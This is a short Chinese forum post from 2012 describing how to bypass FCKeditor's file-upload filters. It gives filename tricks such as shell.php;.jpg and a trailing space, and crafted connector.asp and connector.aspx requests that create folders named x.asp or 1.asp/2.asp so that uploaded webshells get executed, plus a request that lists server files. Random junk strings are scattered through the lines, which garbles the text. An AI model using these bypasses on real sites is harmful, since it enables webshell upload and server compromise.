很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg" t- ^4 d/ u* @" r/ S
2 E8 z$ {$ T1 _$ a提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。8 ~+ j9 [0 Q8 j8 G0 y: B; a+ [
. G5 J e5 N! Q. c继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
& o' f V3 G Z- I# Q# }: y2 h3 b# @" w, @- Q+ S8 j$ \( U
突破建立文件夹:
; L3 h2 M3 Y! S; q; K- a3 p' m$ L: X5 Q6 z& u1 z# P; a
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp4 C4 X) J. W$ d
- F3 K! G7 P: `参数:
9 o% f4 H& J* P5 q5 x% h- Y3 y7 d
4 d. H7 k+ ~) ^" ?( ^' g, ]当前目录名:CurrentFolder=/qing.asp
5 R3 ~. s1 R3 ?# g
* [; f! d$ g, T$ b新的目录名:NewFolderName=x.asp) E$ x$ k2 C% G; Q
8 U# H: n9 g/ f' i% H其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
0 ~2 ~: S: e* B# `! }! i+ x/ u% s. T: c( h& h U
那么 x.asp 就已经建立生成了,此方法百试百灵!+ n1 B- O, s& L- V' U6 @
R. e8 z4 l2 i8 }" T$ B* [0 H新建文件夹参数 x.asp,基本都能搞定。
/ X1 v" O8 q) x/ r& @: v; T+ X. ?4 Q3 b6 ?! ~7 T) i2 T' x. _6 t
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
2 y7 |4 r& |! T6 x/ G
& W' F4 V0 d5 k# laspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
+ q2 Z; m7 m6 `! b1 |: L9 Z0 Q) a# o( U0 P
获取文件列表# B: u7 H) ?# G; o+ S1 Y5 s
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
2 U9 H) ]" Z J' Y2 X
2 C- F# Q5 A3 ?9 P! l9 H$ h/ C0 f5 [ |
发表于 2012-12-31 09:27:09
收藏
支持
反对